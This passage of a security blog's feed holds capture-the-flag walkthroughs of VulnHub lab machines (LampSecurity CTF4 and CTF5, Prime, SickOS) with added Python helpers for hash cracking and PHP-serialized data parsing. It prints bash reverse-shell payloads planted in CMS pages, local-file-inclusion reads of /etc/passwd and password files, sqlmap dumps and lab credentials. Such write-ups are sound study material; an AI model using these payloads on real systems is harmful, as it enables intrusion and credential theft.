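    return users


def crack(users, wordlist):
    """Return {username: plaintext} for each hash whose preimage is in wordlist.
    Hashes are grouped by (algorithm, digest), so each candidate word is hashed
    once per algorithm rather than once per user."""
    targets = {}
    for name, h in users.items():
        algo = identify(h)
        if algo:
            targets.setdefault((algo, h), []).append(name)
    algos = {algo for algo, _ in targets}
    found = {}
    for word in wordlist:
        for algo in algos:
            digest = hashlib.new(algo, word.encode()).hexdigest()
            for name in targets.get((algo, digest), []):
                found[name] = word
    return found


# Constructed sample: hashes are computed here from chosen plaintexts so the
# example runs offline. brian:my2cents is the pair the CTF7 writeup found;
# the other rows are invented, and mallory's bcrypt hash shows what a
# non-crackable (here: unsupported) scheme looks like to identify().
SAMPLE_DUMP = "\n".join([
    "brian:" + hashlib.md5(b"my2cents").hexdigest(),
    "alice:" + hashlib.sha1(b"password1").hexdigest(),
    "carol:" + hashlib.sha256(b"correct horse battery").hexdigest(),
    "mallory:$2y$10$notahexdigestbutbcrypt",
])
SAMPLE_WORDLIST = ["123456", "password1", "my2cents", "letmein"]

if __name__ == "__main__":
    for user, pw in crack(parse_dump(SAMPLE_DUMP), SAMPLE_WORDLIST).items():
        print(f"{user}:{pw}")
```

For real dumps, feed a proper wordlist (rockyou.txt) and prefer hashcat or john for speed; this loop is there to make the algorithm-guess, group, hash, compare sequence explicit.
]]>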
<tags>
<tag> vulnhub target machines </tag>
</tags>
</entry>
<entry>
<title>LampSecurityCTF5</title>
<link href="/2023/04/15/LampSecurityCTF5/"/>
<url>/2023/04/15/LampSecurityCTF5/</url>
<content type="html"><![CDATA[<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>Information gathering</h2><h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>Host discovery</h3><p><code>sudo nmap -sn 192.168.37.0/24</code></p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153955264.png" alt="image-20230415153955264" style="zoom:50%;"><p>Target IP: 192.168.37.152</p><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>Port scan</h3><p><code>sudo nmap --min-rate 10000 -p- 192.168.37.152</code></p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153940419.png" alt="image-20230415153940419" style="zoom:50%;"><p>These ports are open.</p><p><code>sudo nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306 192.168.37.152</code></p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153932643.png" alt="image-20230415153932643" style="zoom:50%;"><h2 id="WEB渗透"><a href="#WEB渗透" class="headerlink" title="WEB渗透"></a>Web exploitation</h2><p>Visit port 80.</p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153924529.png" alt="image-20230415153924529"></p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>Directory scan</h3><p><code>dirsearch -u 192.168.37.152 -e * </code></p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153912861.png" alt="image-20230415153912861" style="zoom:50%;"><img src="/2023/04/15/LampSecurityCTF5/image-20230415153903694.png" alt="image-20230415153903694" style="zoom:50%;"><img src="/2023/04/15/LampSecurityCTF5/image-20230415153856454.png" alt="image-20230415153856454" style="zoom:50%;"><p>There are several login entry points.</p><h3 id="指纹利用"><a href="#指纹利用" class="headerlink" title="指纹利用"></a>Fingerprinting</h3><p>Clicking Blog on the home page opens Andy Carp's Blog, which runs on NanoCMS.</p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153847605.png" alt="image-20230415153847605"></p><p>There is an RCE that requires admin privileges.</p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153838648.png" alt="image-20230415153838648"></p><p>There is also an information disclosure.</p><p>Visit /data/pagesdata.txt </p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153828653.png" alt="image-20230415153828653"></p><p>It is a PHP-serialized blob that contains the password hash.</p><p>Identify the hash with hash-identifier.</p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153816750.png" alt="image-20230415153816750" style="zoom:50%;"><p>Most likely MD5.</p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153805965.png" alt="image-20230415153805965"></p><p>The password is shannon.</p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153754049.png" alt="image-20230415153754049" style="zoom:67%;"><p>Edit a page's content and insert a PHP reverse shell.</p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153743613.png" alt="image-20230415153743613" style="zoom:67%;"><p>After requesting <code>../index.php?page=contact</code>:</p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153734558.png" alt="image-20230415153734558"></p><p>Reverse shell obtained.</p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>Privilege escalation</h2><p>/etc/passwd lists several user accounts.<img src="/2023/04/15/LampSecurityCTF5/image-20230415153723253.png" alt="image-20230415153723253" style="zoom:67%;"></p><blockquote><p><strong>User ID</strong></p><p>The user's uid: root is normally 0, 1-499 (up to 999 on some systems) are system accounts, and 500-65535 (starting at 1000 on some systems) are regular login accounts.</p></blockquote><p><strong>With many users, grep across their home directories for anything password-related:</strong></p><p><code>grep -R -i pass /home/* 2>/dev/null</code></p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153712137.png" alt="image-20230415153712137"></p><p><code>cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note</code></p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153705060.png" alt="image-20230415153705060"></p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153653667.png" alt="image-20230415153653667"></p><blockquote><p>standard in must be a tty</p><p>This usually means the command was run from a non-interactive shell: commands that need to read from a terminal fail with this error when stdin is not a tty.</p></blockquote><p>So spawn a pty with python: <code>python -c "import pty; pty.spawn('/bin/sh')"</code></p><blockquote><p>This creates an interactive shell in the current session; it is commonly used to upgrade a limited reverse shell to a fully interactive one (it does not elevate privileges by itself; su or sudo still does that).</p></blockquote><p>Root obtained.</p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153546136.png" alt="image-20230415153546136"></p>]]></content>
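<![CDATA[The pagesdata.txt step above reads the admin hash out of a PHP-serialized blob by eye. As an added example that is not part of the original writeup, here is a small parser for that format: enough of PHP's serialize() output (N, b, i, d, s, a) to walk the file without a PHP interpreter and return every "password" key. The sample blob is constructed in the shape of a NanoCMS data file; the hash in it is md5("password"), not the machine's real value.

```python
"""Parse a PHP-serialized NanoCMS data file and extract the password hash.

Added example, not from the original CTF5 writeup. String lengths in the
format are byte counts, so the parser works on bytes.
"""


def php_unserialize(data):
    """Deserialize a PHP value from bytes; PHP arrays become dicts."""
    if isinstance(data, str):
        data = data.encode()
    data = data.strip()

    def parse(pos):
        t = data[pos:pos + 1]
        if t == b"N":                                   # N;
            return None, pos + 2
        if t in (b"i", b"d", b"b"):                     # i:42;  d:1.5;  b:1;
            end = data.index(b";", pos)
            raw = data[pos + 2:end]
            if t == b"i":
                val = int(raw)
            elif t == b"d":
                val = float(raw)
            else:
                val = raw == b"1"
            return val, end + 1
        if t == b"s":                                   # s:LEN:"bytes";
            colon = data.index(b":", pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2                           # skip :"
            val = data[start:start + length].decode("utf-8", "replace")
            if data[start + length:start + length + 2] != b'";':
                raise ValueError(f"bad string terminator at {start + length}")
            return val, start + length + 2
        if t == b"a":                                   # a:COUNT:{key;value...}
            colon = data.index(b":", pos + 2)
            count = int(data[pos + 2:colon])
            p = colon + 2                               # skip :{
            result = {}
            for _ in range(count):
                key, p = parse(p)
                result[key], p = parse(p)
            return result, p + 1                        # skip }
        raise ValueError(f"unsupported type {t!r} at offset {pos}")

    value, end = parse(0)
    if end != len(data):
        raise ValueError(f"trailing data after offset {end}")
    return value


def find_keys(obj, wanted, path=""):
    """Yield (path, value) for every key named `wanted` at any nesting depth."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            here = f"{path}/{key}"
            if key == wanted:
                yield here, val
            yield from find_keys(val, wanted, here)


def extract_password_hash(blob):
    """Return the first 'password' value in a serialized blob, or None."""
    for _, val in find_keys(php_unserialize(blob), "password"):
        return val
    return None


# Constructed sample in the shape of NanoCMS's data file (not the real one).
SAMPLE = (
    b'a:3:{s:5:"pages";a:1:{s:5:"about";a:2:{s:5:"title";s:5:"About";'
    b's:4:"body";s:11:"Hello world";}}s:8:"username";s:5:"admin";'
    b's:8:"password";s:32:"5f4dcc3b5aa765d61d8327deb882cf99";}'
)

if __name__ == "__main__":
    print(extract_password_hash(SAMPLE))
```

Run it against the downloaded file with `php_unserialize(open("pagesdata.txt", "rb").read())`; if the file contains objects (`O:`) the parser raises instead of guessing, which is the safe behaviour for data taken from a target.
]]>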
<tags>
<tag> vulnhub target machines </tag>
</tags>
</entry>
<entry>
<title>LampSecurityCTF4</title>
<link href="/2023/03/29/LampSecurityCTF4/"/>
<url>/2023/03/29/LampSecurityCTF4/</url>
<content type="html"><![CDATA[<h1 id="LampSecurityCTF4"><a href="#LampSecurityCTF4" class="headerlink" title="LampSecurityCTF4"></a>LampSecurityCTF4</h1><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>Information gathering</h2><h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>Host discovery</h3><p><code>sudo nmap -sn 192.168.37.0/24</code></p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328230552578.png" alt="image-20230328230552578"></p><p>Target IP: 192.168.37.148</p><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>Port scan</h3><p><code>sudo nmap --min-rate=10000 -p- 192.168.37.148</code></p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328230712302.png" alt="image-20230328230712302"></p><p><code>sudo nmap -sT -sV -O -p22,25,80,631 192.168.37.148</code></p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328230824664.png" alt="image-20230328230824664"></p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>Directory scan</h3><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328232343871.png" alt="image-20230328232343871"></p><p><code>robots.txt</code> contains:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">User-agent: *</span><br><span class="line">Disallow: /mail/</span><br><span class="line">Disallow: /restricted/</span><br><span class="line">Disallow: /conf/</span><br><span class="line">Disallow: /sql/</span><br><span class="line">Disallow: /admin/</span><br></pre></td></tr></table></figure><p><code>/conf/</code> returns an error; <code>/restricted/</code>, <code>/mail/</code> and <code>/admin/</code> all require a login.</p><p>The <code>/sql/</code> directory is listable and <code>/sql/db.sql</code> can be read directly:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use ehks;</span><br><span class="line">create table user (user_id int not null auto_increment primary key, user_name varchar(20) not null, user_pass varchar(32) not null);</span><br><span class="line">create table blog (blog_id int primary key not null auto_increment, blog_title varchar(255), blog_body text, blog_date datetime not null);</span><br><span class="line">create table comment (comment_id int not null auto_increment primary key, comment_title varchar (50), comment_body text, comment_author varchar(50), comment_url varchar(50), comment_date datetime not null);</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>/pages is a directory containing blog.php and similar files that match the front-end pages, which suggests the page parameter is fed to a file include and may allow path traversal.</p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328235139390.png" alt="image-20230328235139390"></p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328235201903.png" alt="image-20230328235201903"></p><h2 id="Web渗透"><a href="#Web渗透" class="headerlink" title="Web渗透"></a>Web exploitation</h2><h3 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>SQL injection</h3><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328232318993.png" alt="image-20230328232318993"></p><p>Testing reveals an SQL injection point.</p><p>Dump the database with sqlmap:</p><p><code>sqlmap -u 'http://192.168.37.148/index.html?page=blog&title=Blog&id=2' --dbs --dump --batch</code></p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328234736065.png" alt="image-20230328234736065"></p><p>All of the recovered credentials log in to the <code>/admin/</code> back end; they also work over SSH, and from there the account can be escalated to <code>root</code>.</p><p>SSH initially fails with the error shown, so add the legacy key-exchange and host-key algorithms:</p><p><code>sudo ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 -oHostKeyAlgorithms=ssh-rsa,ssh-dss [email protected]</code></p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230329000239530.png" alt="image-20230329000239530"></p><h3 id="目录穿越"><a href="#目录穿越" class="headerlink" title="目录穿越"></a>Path traversal</h3><p>The URL format noted above, <code>index.html?page=blog&title=Blog&id=2</code>, suggests server code along the lines of <code>include($_GET['page'].'.php')</code>.</p><p>whatweb reports PHP 5.1.2. PHP versions below 5.3.4 do not reject null bytes in file paths, so a <code>%00</code> in the page parameter truncates the appended <code>.php</code> suffix and lets an arbitrary file be included.</p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230329001412916.png" alt="image-20230329001412916"></p>]]></content>
<tags>
<tag> vulnhub target machines </tag>
</tags>
</entry>
<entry>
<title>Prime</title>
<link href="/2023/03/17/Prime/"/>
<url>/2023/03/17/Prime/</url>
<content type="html"><![CDATA[<h2 id="靶机介绍"><a href="#靶机介绍" class="headerlink" title="靶机介绍"></a>About the machine</h2><blockquote><p>This machine is designed for those one who is trying to prepare for OSCP or OSCP-Exam.</p><p>This is first level of prime series. Some help at every stage is given. Machine is lengthy as OSCP and Hackthebox’s machines are designed.</p><p>So you have a target to get root flag as well as user flag. If stuck on a point some help are given at a level of enumeration. If any extra help needed</p><p>Visit our website <a href="http://hacknpentest.com/">http://hacknpentest.com</a> and <a href="http://hnpsecurity.com/">http://hnpsecurity.com</a>.</p></blockquote><p><strong>Target IP</strong></p><p><img src="/2023/03/17/Prime/image-20230315130246204.png"></p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>Information gathering</h2><h3 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap扫描"></a>nmap scan</h3><p><code>sudo nmap --min-rate 10000 -p- 192.168.37.138</code></p><p><code>sudo nmap -sT -sV -O -p22,80 192.168.37.138</code></p><p><img src="/2023/03/17/Prime/image-20230315130505547.png" alt="image-20230315130505547"></p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>Directory scan</h3><p><code>dirsearch -u 192.168.37.138 -e * -x 403</code></p><p><img src="/2023/03/17/Prime/image-20230315144425580.png" alt="image-20230315144425580"></p><h4 id="x2F-dev"><a href="#x2F-dev" class="headerlink" title="/dev"></a>/dev</h4><p><img src="/2023/03/17/Prime/image-20230315144436401.png" alt="image-20230315144436401"></p><p>This is a hint, found by scanning, that tells us to scan more deeply.</p><h4 id="x2F-wordpress-x2F-wp-login-php"><a href="#x2F-wordpress-x2F-wp-login-php" class="headerlink" title="/wordpress/wp-login.php"></a>/wordpress/wp-login.php</h4><p><img src="/2023/03/17/Prime/image-20230315144454527.png" alt="image-20230315144454527"></p><p>The WordPress admin login.</p><h4 id="x2F-wordpress"><a href="#x2F-wordpress" class="headerlink" title="/wordpress"></a>/wordpress</h4><p><img src="/2023/03/17/Prime/image-20230315144531119.png" alt="image-20230315144531119"></p><p>A WordPress site.</p><p>Scan again with dirb: <code>dirb http://192.168.37.138 -X .txt,.zip</code></p><p><img src="/2023/03/17/Prime/image-20230315151948348.png" alt="image-20230315151948348"></p><h4 id="x2F-secret-txt"><a href="#x2F-secret-txt" class="headerlink" title="/secret.txt"></a>/secret.txt</h4><p><img src="/2023/03/17/Prime/image-20230315152030249.png" alt="image-20230315152030249"></p><p>This hint says to fuzz the PHP pages already found for a valid parameter; it also mentions a location.txt that needs to be looked at.</p><p>It links to <code>wfuzz</code>, a fuzzing tool shipped with Kali.</p><p><code>dirb http://192.168.37.138 -X .php</code></p><p>Look for PHP pages.</p><p><img src="/2023/03/17/Prime/image-20230315153524253.png" alt="image-20230315153524253"></p><h3 id="Fuzz"><a href="#Fuzz" class="headerlink" title="Fuzz"></a>Fuzz</h3><h4 id="x2F-image-php"><a href="#x2F-image-php" class="headerlink" title="/image.php"></a>/image.php</h4><p><img src="/2023/03/17/Prime/image-20230315155156090.png" alt="image-20230315155156090"></p><h4 id="x2F-index-php"><a href="#x2F-index-php" class="headerlink" title="/index.php"></a>/index.php</h4><p><img src="/2023/03/17/Prime/image-20230315155244206.png" alt=" "></p><p>The parameter file is found.</p><p>Request the page with file:</p><p><img src="/2023/03/17/Prime/image-20230315160546053.png" alt="image-20230315160546053"></p><p>The response says the parameter value is wrong; try the location.txt hinted at earlier.</p><p><img src="/2023/03/17/Prime/image-20230315161439318.png" alt="image-20230315161439318"></p><p>Another parameter appears: <code>secrettier360</code></p><p><img src="/2023/03/17/Prime/image-20230315161822628.png" alt="image-20230315161822628"></p><p>That parameter belongs to image.php and behaves like a local file inclusion.</p><h2 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>File inclusion</h2><p><code>curl http://192.168.37.138/image.php?secrettier360=../../../../../../etc/passwd</code></p><p><img src="http://42.193.172.120:8088/images/2023/03/21/image-20230321144624395.png" alt="image-20230321144624395"></p><p>Following the hint in /etc/passwd, read password.txt:</p><p><code>curl http://192.168.37.138/image.php?secrettier360=../../../../../../home/saket/password.txt</code></p><p><img src="/2023/03/17/Prime/image-20230322185944244.png" alt="image-20230322185944244"></p><p>This gives the password follow_the_ippsec; SSH logins with it fail for every user tried.</p><h2 id="Wordpress"><a href="#Wordpress" class="headerlink" title="Wordpress"></a>Wordpress</h2><blockquote><p><strong>WPScan is a vulnerability scanner shipped with Kali Linux. Written in Ruby, it scans WordPress sites for many kinds of security issues, including theme, plugin and WordPress core vulnerabilities. Recent versions carry a database of more than 18000 plugin and 2600 theme vulnerabilities and support the latest WordPress releases. Besides sensitive files such as robots.txt, it also detects enabled plugins and other features.</strong></p></blockquote><p><code>wpscan --url http://192.168.37.138/wordpress -e u</code></p><p>With one password already known, enumerate WordPress usernames with <code>-e u</code>; this finds the user victor.</p><p><img src="/2023/03/17/Prime/image-20230322194728822.png" alt="image-20230322194728822"></p><p>Login succeeds.</p><p><img src="/2023/03/17/Prime/image-20230322195639260.png" alt="image-20230322195639260"></p><p>Once in the WordPress admin panel, the usual approach is to check whether plugins can be uploaded, or whether Appearance / Theme Editor exposes a writable script file.</p><p>Uploading a zip as a plugin does not work.</p><p><img src="/2023/03/17/Prime/image-20230322201902573.png" alt="image-20230322201902573"></p><p>The Theme Editor allows editing secret.php; write a reverse-shell payload into it.</p><p><img src="/2023/03/17/Prime/image-20230322202228133.png" alt="image-20230322202228133"></p><p><code><?php system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.37.135/7777 0>&1'"); ?></code></p><p><img src="/2023/03/17/Prime/image-20230322202729914.png" alt="image-20230322202729914"></p><p>Next, find the path of secret.php.</p><blockquote><p>WordPress themes live under "wp-content/themes/"; each theme has its own directory there, usually named after the theme. To add a theme, upload its folder into that directory and activate it under Appearance / Themes in the admin panel.</p></blockquote><p>/wp-content/themes/twentynineteen/secret.php </p><p><img src="/2023/03/17/Prime/image-20230322203406131.png" alt="image-20230322203406131"></p><p>Reverse shell obtained.</p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>Privilege escalation</h2><p><img src="/2023/03/17/Prime/image-20230322203854460.png" alt="image-20230322203854460"></p><p>The hint points to /home/saket/.</p><p>user.txt holds ciphertext that does not crack as MD5; enc is an executable that asks for a password when run.</p><p><img src="/2023/03/17/Prime/image-20230322213605210.png" alt="image-20230322213605210"></p><p>Search for backup files with find (backups often hold key information):</p><p><code>find / -name '*backup*' 2>/dev/null | sort | less</code></p><blockquote><p>Discarding error output: <code>2>/dev/null</code> sends stderr to /dev/null.</p><p>Every Linux process has three standard file descriptors: stdin (0), stdout (1) and stderr (2). Commands normally write both stdout and stderr to the terminal. When the error messages are unwanted (here, the permission-denied noise from find), redirect descriptor 2 with <code>></code> to /dev/null, a special device file that discards everything written to it.</p></blockquote><p>This finds /opt/backup/server_database/backup_pass<img src="/2023/03/17/Prime/image-20230322214027888.png" alt="image-20230322214027888"></p><p>Password: <strong>backup_password</strong></p><p>Running enc with it produces the key and ciphertext files.</p><p><img src="/2023/03/17/Prime/image-20230322214218148.png" alt="image-20230322214218148"></p><p><img src="/2023/03/17/Prime/image-20230322214602948.png" alt="image-20230322214602948"></p><p>The hint says to use the MD5 of ippsec as the key to decrypt enc.txt.</p><p><img src="/2023/03/17/Prime/image-20230322214548296.png" alt="image-20230322214548296"></p><p><strong>366a74cb3c959de17d61db30591c39d1</strong></p><p>The same hash can be produced with echo and md5sum, but echo needs -n to drop the trailing newline, otherwise the hash is of a different string.</p><p><img src="/2023/03/17/Prime/image-20230328010851938.png" alt="image-20230328010851938"></p><p>Decrypt with openssl, trying each cipher name listed in txt:</p><p><img src="/2023/03/17/Prime/image-20230328201505755.png" alt="image-20230328201505755"></p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for i in $(cat txt);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -K '33363661373463623363393539646531376436316462333035393163333964310a' -$i 2>/dev/null; echo $i; done</span><br></pre></td></tr></table></figure><p><img src="/2023/03/17/Prime/image-20230328203725787.png" alt="image-20230328203725787"></p><p>The decrypted result is saket's password: tribute_to_ippsec</p><p>Switch to that account and check its privileges.<img src="/2023/03/17/Prime/Users\ljx\AppData\Roaming\Typora\typora-user-images\image-20230322215242922.png" alt="image-20230322215242922"></p><p>Run the file the hint points to, /home/victor/undefeated_victor<img src="/2023/03/17/Prime/image-20230322215223805.png" alt="image-20230322215223805"></p><p>It reports that a challenge file cannot be found; create that file with the content /bin/bash (and make it executable) so the program, which runs as root, executes a root shell.</p><p><img src="/2023/03/17/Prime/image-20230322215551337.png" alt="image-20230322215551337"></p><p>Root obtained.</p><p><img src="/2023/03/17/Prime/image-20230322215633795.png" alt="image-20230322215633795"></p>]]></content>
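<![CDATA[The key derivation behind the openssl loop above, as an added example that is not part of the original writeup. Two things worth verifying before reusing that command: `echo ippsec | md5sum` hashes "ippsec\n", which is why -n is needed; and openssl's -K takes the raw key in hex, while the 66-character value quoted above is the hex encoding of the 32-character MD5 string plus a newline (33 bytes), not the 16 MD5 bytes. openssl prints "hex string is too long, ignoring excess" and keeps the first key-length bytes, so with a 256-bit cipher the effective key is the ASCII text of the digest; with a 128-bit cipher it is only its first 16 characters. The constants below are copied from the writeup; the helper names are this example's own.

```python
"""Reproduce the -K value used above and show what key openssl really uses.

Added example, not from the original Prime writeup.
"""
import hashlib

# The -K argument exactly as it appears in the writeup's openssl loop.
K_FROM_WRITEUP = "33363661373463623363393539646531376436316462333035393163333964310a"


def md5_hex(text, trailing_newline=False):
    """hashlib equivalent of `echo -n text | md5sum`, or of `echo text | md5sum`
    when trailing_newline=True (echo without -n appends a newline)."""
    data = text + ("\n" if trailing_newline else "")
    return hashlib.md5(data.encode()).hexdigest()


def ascii_key_hex(md5_string, trailing_newline=False):
    """Hex-encode the MD5 *string* itself, which is what piping the digest text
    through a hex dump produces; this is the form the writeup passed to -K."""
    return (md5_string + ("\n" if trailing_newline else "")).encode().hex()


def effective_key_bytes(k_hex, key_len=32):
    """Key material openssl actually uses for -K: the decoded bytes truncated to
    the cipher's key length (a short value is zero-padded instead)."""
    raw = bytes.fromhex(k_hex)
    return raw[:key_len].ljust(key_len, b"\0")


if __name__ == "__main__":
    digest = md5_hex("ippsec")
    print("md5(ippsec)        :", digest)
    print("md5(ippsec\\n)      :", md5_hex("ippsec", trailing_newline=True))
    print("-K from writeup    :", bytes.fromhex(K_FROM_WRITEUP))
    print("effective 256-bit  :", effective_key_bytes(K_FROM_WRITEUP))
    print("raw digest as -K   :", digest)
```

If the ciphertext had been produced with the 16 raw digest bytes as the key, the correct invocation would be `-K 366a74cb3c959de17d61db30591c39d1` with a 128-bit cipher; the loop above only works because the author of the machine used the ASCII hex string as the key.
]]>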
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>SickOS</title>
<link href="/2023/03/15/SickOS/"/>
<url>/2023/03/15/SickOS/</url>
<content type="html"><![CDATA[<h3 id="描述"><a href="#描述" class="headerlink" title="Description"></a>Description</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">ABOUT RELEASE</span><br><span class="line">Name........: SickOs1.1</span><br><span class="line">Date Release: 11 Dec 2015</span><br><span class="line">Author......: D4rk</span><br><span class="line">Series......: SickOs</span><br><span class="line">Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt</span><br><span class="line">Tester(s)...: h1tch1</span><br><span class="line">Twitter.....: https://twitter.com/D4rk36</span><br></pre></td></tr></table></figure><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="Information Gathering"></a>Information Gathering</h3><h4 id="主机发现"><a href="#主机发现" class="headerlink" title="Host Discovery"></a>Host Discovery</h4><p>IP address: 192.168.37.140</p><img src="/2023/03/15/SickOS/image-20230312222911204.png" alt="image-20230312222911204" style="zoom: 67%;"><h4 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap Scan"></a>nmap Scan</h4><p><img src="/2023/03/15/SickOS/image-20230312224029714.png" alt="image-20230312224029714"></p><p><img src="/2023/03/15/SickOS/image-20230312224236606.png" alt="image-20230312224236606"></p><p>Ports 22, 3128 and 8080 are found.</p><p>Port 8080 is not actually open.</p><p>Two nmap vulnerability scans turn up nothing further.</p><p><img src="/2023/03/15/SickOS/image-20230312224524062.png" alt="image-20230312224524062"></p><p>Visiting ports 3128 and 8080 gives the following:</p><img src="/2023/03/15/SickOS/image-20230312225858677.png" alt="image-20230312225858677" style="zoom:67%;"><img src="/2023/03/15/SickOS/image-20230312225908889.png" alt="image-20230312225908889" style="zoom:67%;"><p>Both responses show that the service on port 3128 is Squid, so we look up what Squid is.</p><blockquote><p><a href="https://www.open-open.com/misc/goto?guid=4958185427613467036">Squid cache</a> (Squid for short) is a popular free-software (GNU General Public License) proxy server and web cache. Squid has a wide range of uses: as a front-end cache for a web server that caches repeated requests to speed the server up, as a shared cache of the web, DNS and other network lookups for a group of users, as a traffic filter that helps with network security, and as a way for a LAN to reach the Internet through a proxy. Squid is designed mainly to run on Unix-like systems.</p></blockquote><p>The guess here is that port 80 has to be reached through the proxy on port 3128.</p><h3 id="Squid代理设置"><a href="#Squid代理设置" class="headerlink" title="Squid Proxy Setup"></a>Squid Proxy Setup</h3><p>Following that idea, we can brute-force directories on the target while pointing the scanner at the proxy server.</p><img src="/2023/03/15/SickOS/image-20230313003151041.png" alt="image-20230313003151041" style="zoom:67%;"><p>Set the proxy before visiting in the browser.</p><img src="/2023/03/15/SickOS/image-20230313003529361.png" alt="image-20230313003529361" style="zoom:50%;"><h3 id="Web服务"><a href="#Web服务" class="headerlink" title="Web Service"></a>Web Service</h3><p>Visit robots.txt</p><p><img src="/2023/03/15/SickOS/image-20230313003627827.png" alt="image-20230313003627827"></p><p>Visit the /wolfcms directory</p><img src="/2023/03/15/SickOS/image-20230313003729450.png" alt="image-20230313003729450" style="zoom:67%;"><p>A Google search on the CMS name turns up the admin login address.</p><p><img src="/2023/03/15/SickOS/image-20230313011138489.png" alt="image-20230313011138489"></p><p>The admin login address loads and shows a login form. There are three ways to approach it:</p><ul><li>1. Weak passwords</li><li>2. Default accounts</li><li>3. Brute force</li></ul><p><img src="/2023/03/15/SickOS/image-20230313011207583.png" alt="image-20230313011207583"></p><p>After trying weak passwords, <code>admin/admin</code> logs in.</p><p><img src="/2023/03/15/SickOS/image-20230314003826611.png" alt="image-20230314003826611"></p><p>Many of the pages are executed as PHP scripts, and there is also a file-upload entry point.</p><p><img src="/2023/03/15/SickOS/image-20230314003944203.png" alt="image-20230314003944203"></p><p><img src="/2023/03/15/SickOS/image-20230314004000255.png" alt="image-20230314004000255"></p><p>We try inserting a one-line PHP backdoor into Articles:</p><p><code>&lt;?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.37.135/7777 0>&1'");?&gt;</code></p><p>Opening Articles triggers the reverse shell.</p><p><img src="/2023/03/15/SickOS/image-20230314004524690.png" alt="image-20230314004524690"></p><h3 id="提权"><a href="#提权" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h3><p>Look at the site configuration file config.php</p><p><img src="/2023/03/15/SickOS/image-20230314005652091.png" alt="image-20230314005652091"></p><p>Database credentials obtained: <code>root/john@123</code></p><p>Check /etc/passwd to learn the machine's users and their privileges.</p><p><img src="/2023/03/15/SickOS/image-20230314103710896.png" alt="image-20230314103710896"></p><p>Try the database credentials for an SSH login to the target.</p><p><img src="/2023/03/15/SickOS/image-20230314103909232.png" alt="image-20230314103909232"></p><p>The SSH login succeeds and gives us the sickos account.</p><p><img 